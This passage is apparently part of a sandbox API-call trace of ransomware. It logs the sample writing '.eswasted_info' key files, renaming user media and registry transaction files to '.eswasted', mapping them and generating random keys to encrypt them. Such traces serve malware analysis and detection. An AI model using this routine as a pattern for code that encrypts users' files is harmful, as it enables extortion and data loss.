HALPmcxz\\Music\\UOxsgApI7tAZZG1\\rEEbJuWKpyn.m4a") returned 71 [0079.115] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x298) returned 0x6f5cc0 [0079.115] lstrcpyW (in: lpString1=0x6f5d4e, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0079.115] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x722428 [0079.115] CryptAcquireContextW (in: phProv=0x114fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fde8*=0x70f058) returned 1 [0079.116] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x722428 | out: pbBuffer=0x722428) returned 1 [0079.116] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0079.116] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\UOxsgApI7tAZZG1\\rEEbJuWKpyn.m4a.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uoxsgapi7tazzg1\\reebjuwkpyn.m4a.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0079.117] WriteFile (in: hFile=0x124, lpBuffer=0x722428*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x114fe04, lpOverlapped=0x0 | out: lpBuffer=0x722428*, lpNumberOfBytesWritten=0x114fe04*=0xa46, lpOverlapped=0x0) returned 1 [0079.118] SetEndOfFile (hFile=0x124) returned 1 [0079.118] SetFilePointer (in: hFile=0x124, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.118] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x722428 | out: hHeap=0x6d0000) returned 1 [0079.118] lstrcpyW (in: lpString1=0x6f5d4e, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0079.119] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\UOxsgApI7tAZZG1\\rEEbJuWKpyn.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uoxsgapi7tazzg1\\reebjuwkpyn.m4a"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\UOxsgApI7tAZZG1\\rEEbJuWKpyn.m4a.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uoxsgapi7tazzg1\\reebjuwkpyn.m4a.eswasted")) returned 1 [0079.119] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\UOxsgApI7tAZZG1\\rEEbJuWKpyn.m4a.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uoxsgapi7tazzg1\\reebjuwkpyn.m4a.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0079.120] CreateFileMappingW (hFile=0x11c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x108 [0079.122] CryptAcquireContextW (in: phProv=0x114fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fdc4*=0x70f058) returned 1 [0079.123] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0079.123] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0079.123] CryptAcquireContextW (in: phProv=0x114fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fb2c*=0x70f058) returned 1 [0079.124] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x114fb48 | out: pbBuffer=0x114fb48) returned 1 [0079.124] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0079.135] SetEndOfFile (hFile=0x124) returned 1 [0079.138] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x722428 | out: hHeap=0x6d0000) returned 1 [0079.138] CloseHandle (hObject=0x124) returned 1 [0079.140] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5cc0 | out: hHeap=0x6d0000) returned 1 [0079.140] CryptAcquireContextW (in: phProv=0x114fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fe0c*=0x70f058) returned 1 [0079.141] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x114fe48 | out: pbBuffer=0x114fe48) returned 1 [0079.141] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0079.141] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\UOxsgApI7tAZZG1\\sm2z.mp3") returned 64 [0079.141] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x28a) returned 0x6f5cc0 [0079.141] lstrcpyW (in: lpString1=0x6f5d40, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0079.141] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x722428 [0079.141] CryptAcquireContextW (in: phProv=0x114fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fde8*=0x70f058) returned 1 [0079.142] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x722428 | out: pbBuffer=0x722428) returned 1 [0079.142] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0079.142] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\UOxsgApI7tAZZG1\\sm2z.mp3.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uoxsgapi7tazzg1\\sm2z.mp3.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x130 [0079.150] WriteFile (in: hFile=0x130, lpBuffer=0x722428*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x114fe04, lpOverlapped=0x0 | out: lpBuffer=0x722428*, lpNumberOfBytesWritten=0x114fe04*=0xa46, lpOverlapped=0x0) returned 1 [0079.151] SetEndOfFile (hFile=0x130) returned 1 [0079.152] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.152] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x722428 | out: hHeap=0x6d0000) returned 1 [0079.152] lstrcpyW (in: lpString1=0x6f5d40, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0079.152] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\UOxsgApI7tAZZG1\\sm2z.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uoxsgapi7tazzg1\\sm2z.mp3"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\UOxsgApI7tAZZG1\\sm2z.mp3.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uoxsgapi7tazzg1\\sm2z.mp3.eswasted")) returned 1 [0079.153] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\UOxsgApI7tAZZG1\\sm2z.mp3.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uoxsgapi7tazzg1\\sm2z.mp3.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0079.153] CreateFileMappingW (hFile=0x124, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x108 [0079.154] CryptAcquireContextW (in: phProv=0x114fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fdc4*=0x70f058) returned 1 [0079.155] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0079.155] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0079.155] CryptAcquireContextW (in: phProv=0x114fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fb2c*=0x70f058) returned 1 [0079.156] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x114fb48 | out: pbBuffer=0x114fb48) returned 1 [0079.156] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0079.167] SetEndOfFile (hFile=0x130) returned 1 [0079.169] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x722428 | out: hHeap=0x6d0000) returned 1 [0079.169] CloseHandle (hObject=0x130) returned 1 [0079.173] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5cc0 | out: hHeap=0x6d0000) returned 1 [0079.173] CryptAcquireContextW (in: phProv=0x114fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fe0c*=0x70f058) returned 1 [0079.222] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x114fe48 | out: pbBuffer=0x114fe48) returned 1 [0079.222] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0079.222] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\UOxsgApI7tAZZG1\\XQTEpt6yfk1FszKtMw.m4a") returned 78 [0079.222] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2a6) returned 0x71ec18 [0079.222] lstrcpyW (in: lpString1=0x71ecb4, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0079.222] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x721728 [0079.222] CryptAcquireContextW (in: phProv=0x114fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fde8*=0x70f058) returned 1 [0079.223] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x721728 | out: pbBuffer=0x721728) returned 1 [0079.223] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0079.223] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\UOxsgApI7tAZZG1\\XQTEpt6yfk1FszKtMw.m4a.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uoxsgapi7tazzg1\\xqtept6yfk1fszktmw.m4a.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x130 [0079.224] WriteFile (in: hFile=0x130, lpBuffer=0x721728*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x114fe04, lpOverlapped=0x0 | out: lpBuffer=0x721728*, lpNumberOfBytesWritten=0x114fe04*=0xa46, lpOverlapped=0x0) returned 1 [0079.225] SetEndOfFile (hFile=0x130) returned 1 [0079.225] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.225] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x721728 | out: hHeap=0x6d0000) returned 1 [0079.225] lstrcpyW (in: lpString1=0x71ecb4, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0079.225] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\UOxsgApI7tAZZG1\\XQTEpt6yfk1FszKtMw.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uoxsgapi7tazzg1\\xqtept6yfk1fszktmw.m4a"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\UOxsgApI7tAZZG1\\XQTEpt6yfk1FszKtMw.m4a.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uoxsgapi7tazzg1\\xqtept6yfk1fszktmw.m4a.eswasted")) returned 1 [0079.226] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\UOxsgApI7tAZZG1\\XQTEpt6yfk1FszKtMw.m4a.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uoxsgapi7tazzg1\\xqtept6yfk1fszktmw.m4a.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0079.226] CreateFileMappingW (hFile=0x124, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x11c [0079.227] CryptAcquireContextW (in: phProv=0x114fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fdc4*=0x70f058) returned 1 [0079.228] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7112a8 | out: pbBuffer=0x7112a8) returned 1 [0079.228] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0079.229] CryptAcquireContextW (in: phProv=0x114fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fb2c*=0x70f058) returned 1 [0079.229] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x114fb48 | out: pbBuffer=0x114fb48) returned 1 [0079.229] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0079.240] SetEndOfFile (hFile=0x130) returned 1 [0079.242] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x721728 | out: hHeap=0x6d0000) returned 1 [0079.242] CloseHandle (hObject=0x130) returned 1 [0079.244] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71ec18 | out: hHeap=0x6d0000) returned 1 [0079.244] CryptAcquireContextW (in: phProv=0x114fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fe0c*=0x70f058) returned 1 [0079.245] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x114fe48 | out: pbBuffer=0x114fe48) returned 1 [0079.245] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0079.246] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\xqi1zZou.m4a") returned 52 [0079.246] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x272) returned 0x71ec18 [0079.246] lstrcpyW (in: lpString1=0x71ec80, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0079.246] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x722428 [0079.246] CryptAcquireContextW (in: phProv=0x114fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fde8*=0x70f058) returned 1 [0079.247] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x722428 | out: pbBuffer=0x722428) returned 1 [0079.247] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0079.247] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\xqi1zZou.m4a.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\xqi1zzou.m4a.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x130 [0079.247] WriteFile (in: hFile=0x130, lpBuffer=0x722428*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x114fe04, lpOverlapped=0x0 | out: lpBuffer=0x722428*, lpNumberOfBytesWritten=0x114fe04*=0xa46, lpOverlapped=0x0) returned 1 [0079.248] SetEndOfFile (hFile=0x130) returned 1 [0079.249] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.249] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x722428 | out: hHeap=0x6d0000) returned 1 [0079.249] lstrcpyW (in: lpString1=0x71ec80, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0079.249] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\xqi1zZou.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\xqi1zzou.m4a"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\xqi1zZou.m4a.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\xqi1zzou.m4a.eswasted")) returned 1 [0079.250] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\xqi1zZou.m4a.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\xqi1zzou.m4a.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0079.250] CreateFileMappingW (hFile=0x11c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x124 [0079.253] CryptAcquireContextW (in: phProv=0x114fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fdc4*=0x70f058) returned 1 [0079.254] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7112a8 | out: pbBuffer=0x7112a8) returned 1 [0079.254] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0079.254] CryptAcquireContextW (in: phProv=0x114fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fb2c*=0x70f058) returned 1 [0079.255] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x114fb48 | out: pbBuffer=0x114fb48) returned 1 [0079.255] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0079.266] SetEndOfFile (hFile=0x130) returned 1 [0079.316] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x722428 | out: hHeap=0x6d0000) returned 1 [0079.316] CloseHandle (hObject=0x130) returned 1 [0079.318] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71ec18 | out: hHeap=0x6d0000) returned 1 [0079.318] CryptAcquireContextW (in: phProv=0x114fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fe0c*=0x70f058) returned 1 [0079.319] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x114fe48 | out: pbBuffer=0x114fe48) returned 1 [0079.319] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0079.319] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 126 [0079.319] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x306) returned 0x71ec18 [0079.319] lstrcpyW (in: lpString1=0x71ed14, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0079.319] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x722428 [0079.319] CryptAcquireContextW (in: phProv=0x114fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fde8*=0x70f058) returned 1 [0079.320] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x722428 | out: pbBuffer=0x722428) returned 1 [0079.320] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0079.320] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000001.regtrans-ms.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x130 [0079.321] WriteFile (in: hFile=0x130, lpBuffer=0x722428*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x114fe04, lpOverlapped=0x0 | out: lpBuffer=0x722428*, lpNumberOfBytesWritten=0x114fe04*=0xa46, lpOverlapped=0x0) returned 1 [0079.322] SetEndOfFile (hFile=0x130) returned 1 [0079.322] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.322] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x722428 | out: hHeap=0x6d0000) returned 1 [0079.322] lstrcpyW (in: lpString1=0x71ed14, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0079.322] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000001.regtrans-ms"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000001.regtrans-ms.eswasted")) returned 0 [0079.323] GetLastError () returned 0x20 [0079.323] CloseHandle (hObject=0x130) returned 1 [0079.327] lstrcpyW (in: lpString1=0x71ed14, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0079.327] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000001.regtrans-ms.eswasted_info")) returned 1 [0079.328] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71ec18 | out: hHeap=0x6d0000) returned 1 [0079.328] CryptAcquireContextW (in: phProv=0x114fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fe0c*=0x70f058) returned 1 [0079.329] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x114fe48 | out: pbBuffer=0x114fe48) returned 1 [0079.329] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0079.329] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 126 [0079.329] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x306) returned 0x71ec18 [0079.329] lstrcpyW (in: lpString1=0x71ed14, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0079.329] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x722428 [0079.329] CryptAcquireContextW (in: phProv=0x114fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fde8*=0x70f058) returned 1 [0079.330] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x722428 | out: pbBuffer=0x722428) returned 1 [0079.330] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0079.330] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000002.regtrans-ms.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x130 [0079.331] WriteFile (in: hFile=0x130, lpBuffer=0x722428*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x114fe04, lpOverlapped=0x0 | out: lpBuffer=0x722428*, lpNumberOfBytesWritten=0x114fe04*=0xa46, lpOverlapped=0x0) returned 1 [0079.332] SetEndOfFile (hFile=0x130) returned 1 [0079.332] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.332] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x722428 | out: hHeap=0x6d0000) returned 1 [0079.332] lstrcpyW (in: lpString1=0x71ed14, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0079.332] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000002.regtrans-ms"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000002.regtrans-ms.eswasted")) returned 0 [0079.332] GetLastError () returned 0x20 [0079.332] CloseHandle (hObject=0x130) returned 1 [0079.333] lstrcpyW (in: lpString1=0x71ed14, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0079.333] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000002.regtrans-ms.eswasted_info")) returned 1 [0079.334] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71ec18 | out: hHeap=0x6d0000) returned 1 [0079.334] CryptAcquireContextW (in: phProv=0x114fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fe0c*=0x70f058) returned 1 [0079.335] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x114fe48 | out: pbBuffer=0x114fe48) returned 1 [0079.335] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0079.335] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\2CoPk.gif") returned 52 [0079.335] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x272) returned 0x71ec18 [0079.335] lstrcpyW (in: lpString1=0x71ec80, lpString2=".eswasted_info" | out: 